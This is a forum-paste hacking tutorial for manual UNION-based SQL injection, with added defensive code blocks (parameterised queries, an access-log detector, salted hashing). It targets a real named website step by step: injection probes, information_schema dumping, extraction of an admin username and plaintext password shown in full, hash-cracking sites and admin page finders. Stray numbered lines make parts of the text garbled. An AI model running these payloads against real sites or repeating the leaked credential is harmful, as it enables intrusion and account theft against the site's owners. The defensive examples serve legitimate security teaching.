zurael_sTz

Sql injection site Manual (zurael sTz)

Apr 23rd, 2016
Injection site manually
Injecting into a site manually
Hacker zurael sTz
https://twitter.com/zurael_stz

Common types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
What we are going to learn today is what we call UNION Based SQL injection.
Alright, before we start we need to know how a website works when it stores login information/pages/pictures/etc. in its database.
Let's just say that our website will look like this:
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query will look like:
PHP Code:
SELECT * FROM index
WHERE id = 5
Alright, now you know a bit of how the website works, let's get hacking Hehe
Step 1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
Alright, now the way to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them.
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL.
Here's what I found: "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

Now, the way to test for vulnerabilities is by ADDING a quote " ' " at the end of the URL, i.e. after the integer or string.
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This shows that the website is vulnerable to SQL injection.
How is this possible?
Look at the query when we added a quote " ' "
PHP Code:
SELECT * FROM article
WHERE id = 5 '
Notice that their database never stored "id = 5 ' ": the quote we typed in the URL lands inside the SQL statement itself, where it opens a string that is never closed.
This is why they return an error result.
Now that we know the website is vulnerable to SQL injection, let's advance to the next process.
  54. Now that we know the website is vulnerable to SQL injection, let's advance to the next process
  55. Step2: Finding the number of columns a website has
  56.  
  57. This is the part where most people had commonly misunderstood.
  58. To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
  59. Alright lets get started.
  60. The query we'll be using is "order by X--" where "X" is a random integer (number)
  61. Start by entering "order by 25--"
  62. Enter it at the end of the URL, so it'll look like this
  63. Code:
  64. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
  65. Error, there are no 25 columns, so it'll be less than 25
  66.  
  67. Now lets try "order by 20--"
  68. Code:
  69. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
  70. Still Error, so there are less than 20 columns
  71.  
  72. How about we go down a bit to "order by 5--"
  73. Code:
  74. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
  75. aha! No errors. So let's see if there are more than 5 columns
  76.  
  77. Now lets go up to "order by 11--"
  78. Code:
  79. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
  80. Hmm, no errors I see. So it's obvious that there could be more than 11 columns
  81.  
  82. See if we can increase to "order by 12--"
  83. Code:
  84. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
  85. Error! So this means the last number that returned no error is 11
  86. Therefore, the website has 11 columns
  87.  
  88. Tips:
  89. An error while scanning for number of columns will look like this
  90. Spoiler (Click to View)
  91. While No errors will show the page as normal Smile
Step 3: Now that we found the number of columns, time to execute the UNION SELECT statement
First off, we need to know what "UNION SELECT" means.
Let's say we have 2 tables, "users" and "admin".
Basically, UNION SELECT is a statement where all this information will be collected as one result.
Look at this query
PHP Code:
SELECT * FROM users
UNION SELECT * FROM admin
If we perform the UNION SELECT statement, we can get both users and admin information from their database.
The point is that UNION SELECT returns our results with the information we need.
If you want to find vulnerable columns, use UNION SELECT.
If you want to find the version of the database, UNION SELECT.
If you want admin information! use UNION SELECT Hehe
Alright, now that we know something about the UNION function, let's continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
This is what you would normally do when you use the UNION function while SQL injecting a website.

Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string with a hyphen " - " in front of it (so the original query matches nothing and only the UNION rows are shown), and "N" is the numbers 1 up to the column count we found, followed by two hyphens " -- ".
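Here is an added example (not code from the original paste) that shows the mechanism behind Step 1 and Step 3 from the application's side: the same "WHERE id = ..." lookup written the vulnerable way (string concatenation) and the safe way (a bound parameter). It runs against an in-memory SQLite database whose table names and rows are constructed for the example; the quote error and the UNION behaviour are the same as in MySQL.

```python
# Added example, not code from the original paste: the "id=" lookup behind
# "SELECT * FROM article WHERE id = 5", built the vulnerable way and the safe way,
# run against a small in-memory SQLite database (table names and rows are constructed).
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway database shaped like the article's example site."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT);
        INSERT INTO article VALUES (5,  'Battery basics', 'Lead acid chemistry');
        INSERT INTO article VALUES (51, 'News item',      'Some news text');
        CREATE TABLE tbladmin (adminid INTEGER, username TEXT, password TEXT);
        INSERT INTO tbladmin VALUES (1, 'example_admin', 'example_secret');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """String concatenation: the URL value becomes part of the SQL text, so a quote
    breaks the parser (Step 1) and a UNION SELECT is executed as SQL (Step 3)."""
    sql = "SELECT id, title, body FROM article WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Parameterised query: the value is bound separately from the SQL text, so the
    database never parses it. Quotes, UNION and -- inside it are just characters."""
    sql = "SELECT id, title, body FROM article WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def probe(lookup, conn: sqlite3.Connection, raw_id: str) -> str:
    """Summarise what one input does to one lookup function: rows or an SQL error."""
    try:
        rows = lookup(conn, raw_id)
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)
    return "rows: " + repr(rows)


if __name__ == "__main__":
    db = make_db()
    # The three inputs from the article: a normal id, the quote test, and a UNION query.
    for value in ("51", "51'", "-51 UNION SELECT 1,username,password FROM tbladmin--"):
        print("input:", repr(value))
        print("  vulnerable ->", probe(vulnerable_lookup, db, value))
        print("  safe       ->", probe(safe_lookup, db, value))
```

With the vulnerable function the quote produces a syntax error and the UNION input returns the row from tbladmin; the parameterised function returns the normal article for "51" and simply no rows for both injected inputs. For an id that is always numeric, casting to int before the query is a second, independent line of defence.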
Step 4: Random numbers appear on screen, the next step
Alright, I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns": the positions the page echoes back, so whatever we put in those positions of the UNION SELECT will be displayed.
You need to inject the number at the very top (always at the very top).
So, in this case we have number "8".
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get: INFORMATION!
You need a lot of information to study from the website; here are a couple of examples.

Replace the vulnerable column, i.e. number 8, with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
Their functions:
@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = current hosting info
@@datadir = directory of the data of the website

To find the version of the database in the website, replace the vulnerable column, i.e. number 8, with "@@version" or "version()"
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Results:
Code:
5.1.52-log
So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 "<5" = you need to guess tables (a bit of hard work)
Database version greater than 5 ">5" = easy to inject with another function, i.e. group_concat

If you ever want to SQLi a website with version <5, then you can guess the tables with the following list
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll be learning how to get the tables in the next step.
But for now, let's see what we can get with other statements.
Let's try all statements at once, shall we?
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--
Results:
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
We have almost every piece of information we can get about the website.
Look closely here, we used a command "group_concat".
Here's its function:
group_concat = gets every piece of information at once, i.e. grouping them with the help of statements. Ex. group_concat(database())
Note: group_concat won't work with versions less than 5
Step 5: Getting the table names
What are tables?
Tables contain columns and columns contain the data.
It's like a stack (table) of books (columns) and data inside the books (data inside the columns).
Alright, first let's look up some functions we're gonna use to extract table names (Important)
Code:
group_concat = grouping up data to a specific statement
table_name = table names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a hex code that creates a new line for organizing tables in order
Now let's combine those functions and make up a query that will give us the table names.
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
Here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
and then we added
"from information_schema.tables where table_schema=database()--"
after the last column (the two hyphens that used to follow 11 now go at the very end, after the where clause).
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
Alright, now that we've found the tables, what you're gonna have to do is find the tables where user/admin information is stored.
In this case, "tbladmin" seems to have admin information stored in it.
It's all about predicting and expecting what's behind every table you see.
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and add the following
Vulnerable column = replace with "group_concat(table_name,0x0a)"
After the last column = add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string.
Step 6: Getting columns from tables
Alright, obviously our next task is to get the column names from a specific table, which in our case was "tbladmin".
To do this, we're gonna have to alter the queries a bit.
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
Here's what we replaced:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where we entered "0x74626c61646d696e--"
First of all, this is known as hex.
For MySQL to read the hex as a string, we put "0x" at the beginning.
I'll explain this briefly. So our table name was "tbladmin".
To refer to that table in the syntax above, we convert the table name to hex.
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter.
Enter "tbladmin" in the text box and hit convert.
You'll notice the result will be "74626c61646d696e" (that's the hex).
Now to make it readable to the website, add "0x" at the beginning.
So it will be:
Code:
0x74626c61646d696e
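From the defender's side, every request in Steps 2, 3, 5 and 6 leaves a distinctive trace in the web server's access log: a lone quote, "order by N" probes, UNION SELECT, information_schema, group_concat, a trailing "--", and 0x hex literals standing in for strings. The added example below (not part of the original paste) is a small scanner that URL-decodes each query parameter, flags those indicators, and decodes the hex literals back to text so an analyst can see which table was being targeted. The log lines are constructed for the example and mimic the URLs used in this tutorial; the indicator names are my own.

```python
# Added example, not part of the original paste: a small log scanner that flags the
# kind of requests this tutorial generates (quote test, ORDER BY probing, UNION SELECT,
# information_schema, group_concat, trailing comments) in web server access logs.
# The log lines below are constructed for this example; they mimic the article's URLs.
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2016:10:01:02 +0000] "GET /newsdetail.php?id=51 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Apr/2016:10:01:09 +0000] "GET /newsdetail.php?id=51%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [23/Apr/2016:10:01:15 +0000] "GET /newsdetail.php?id=51%20order%20by%2025-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [23/Apr/2016:10:02:40 +0000] "GET /newsdetail.php?id=-51%20UNION%20SELECT%201,2,3,4,5,6,7,'
    'group_concat(column_name,0x0a),9,10,11%20from%20information_schema.columns%20where%20'
    'table_name=0x74626c61646d696e-- HTTP/1.1" 200 4870',
    '198.51.100.9 - - [23/Apr/2016:10:03:00 +0000] "GET /gallery.php?id=7 HTTP/1.1" 200 2210',
]

# Common log format: client, ident, user, [time], "method target protocol", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Each indicator is checked against the URL-decoded value of every query parameter.
INDICATORS = {
    "union-select": re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "information-schema": re.compile(r"\binformation_schema\.", re.I),
    "group-concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "stray-quote": re.compile(r"'"),
    "trailing-comment": re.compile(r"(--|#)\s*$"),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def decode_hex_literals(value: str) -> list:
    """Turn MySQL-style 0x... literals back into text so an analyst can read them
    (e.g. 0x74626c61646d696e -> 'tbladmin'). Unprintable results such as 0x0a are dropped."""
    out = []
    for hex_digits in HEX_LITERAL.findall(value):
        if len(hex_digits) % 2:
            continue  # odd length cannot be a byte string
        text = bytes.fromhex(hex_digits).decode("ascii", errors="replace")
        if text.isprintable():
            out.append(text)
    return out


def scan_line(line: str):
    """Return a finding dict for a log line carrying SQL injection indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, target, status, _size = m.groups()
    parts = urlsplit(target)
    hits = []
    # parse_qsl URL-decodes the values, so %27 becomes a quote and %20 a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        matched = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits.append({"param": name, "indicators": matched,
                         "hex_decoded": decode_hex_literals(value)})
    if not hits:
        return None
    return {"client": client, "time": when, "method": method, "path": parts.path,
            "status": int(status), "hits": hits}


def scan_log(lines) -> list:
    """Scan every line; returns the findings in log order."""
    return [f for f in (scan_line(line) for line in lines) if f]


def flagged_requests_per_client(findings) -> dict:
    """Count findings per client: the step-by-step probing in this tutorial produces a
    burst of flagged requests from one address, typically with 5xx responses first."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["client"], f["status"], f["path"], f["hits"])
    print(flagged_requests_per_client(results))
```

On the sample log this flags three of the five requests, all from one client, and decodes the hex literal in the last one to "tbladmin". The stray-quote indicator is noisy on free-text parameters (names like O'Brien), so in production it is best weighted by the parameter being numeric, as "id" is here; the other indicators rarely appear in legitimate traffic.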

Now that you know how hex works, let's look up the functions we replaced and learn their uses (Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in the database
table_name = extracting columns from a specific table
0xHEX_Code_Table = specific table name converted to hex
Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom
Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "username" and "password".
Step 7: Getting data from columns
Alright, let's extract the information.
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Keep this formula-like syntax in mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(columnName,0x3a,columnName,0x0a) from tablename--
Where "X" is a random integer/string preceded by a hyphen ( - ), "N" is the number/position of the column, "columnName" is the column you want to extract data from, "tablename" is the table you extract from, and two hyphens ( -- ) go at the end.
Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colon.
Results after executing the syntax:
Code:
ishir:ishir123
Username: ishir
Password: ishir123
Special cases: Hashed usernames and passwords
Most websites will have their passwords hashed as MD5.
In this case you'll need to crack them.
Using some websites will help you.
Here's a list of hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
A SHA-1 hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
I'll make up a detailed tutorial on hash cracking soon.
But for now, refer to this for a little knowledge about hashes:
http://hackforums.net/showthread.php?tid=1393830
Credits to Haxor and Insidepro
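The two digests shown above are the unsalted MD5 and SHA-1 of the word "admin", which is exactly why lookup websites can return them instantly: a fast, unsalted hash of a common password is a table lookup, not a computation. The added example below (not code from the original paste) classifies a stored value by the article's length rule, reproduces the two digests, and shows the storage format a site should use instead: a random per-user salt with a slow key derivation function (PBKDF2-HMAC-SHA256 here, chosen because it ships with Python's standard library; the scheme label and iteration count are my own choices).

```python
# Added example, not code from the original paste: why the 32/40-character digests shown
# above fall to lookup websites, and what a site should store instead.
import hashlib
import hmac
import os
import re

# Hex digest length -> the unsalted algorithm it most likely came from (the article's
# "32 characters" / "40 characters" rule of thumb, extended with SHA-256).
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}


def identify_hash(value: str):
    """Classify a stored credential value by shape; None means it is not a plain hex
    digest (a cleartext password such as 'ishir123', or a salted/iterated format)."""
    v = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", v):
        return None
    return HEX_DIGEST_LENGTHS.get(len(v))


def unsalted_digest(algorithm: str, password: str) -> str:
    """What a site that 'hashes passwords as MD5' stores: one deterministic digest per
    password, so every user with the same password gets the same value and any common
    word is a single table lookup away."""
    return hashlib.new(algorithm, password.encode("utf-8")).hexdigest()


def hash_password(password: str, iterations: int = 200_000, salt: bytes = None) -> str:
    """Hardened storage: random per-user salt and a slow KDF (PBKDF2-HMAC-SHA256),
    packed into a self-describing string so the parameters can be upgraded later.
    The 'pbkdf2_sha256$iterations$salt$digest' layout is this example's own convention."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    for stored in ("ishir123", "21232f297a57a5a743894a0e4a801fc3",
                   "d033e22ae348aeb5660fc2140aec35850c4da997"):
        print(stored, "->", identify_hash(stored))
    # Same password for two users: identical unsalted digests, different salted ones.
    print(unsalted_digest("md5", "admin"), unsalted_digest("md5", "admin"))
    print(hash_password("admin"))
    print(hash_password("admin"))
```

Two users with the password "admin" get the same MD5 but two different PBKDF2 strings, so a leaked table cannot be matched against a precomputed list and each entry has to be attacked separately at the cost of 200,000 HMAC iterations per guess.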

Last Step: Finding the admin page and logging in for the goods
Alright, now that we have our admin login info
Username: ishir
Password: ishir123
It's time to find the login pages.
To do this, you can use Admin Page Finders.
Here are some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://hackforums.net/showthread.php?tid...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://hackforums.net/showthread.php?tid...age+finder
Alright, after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/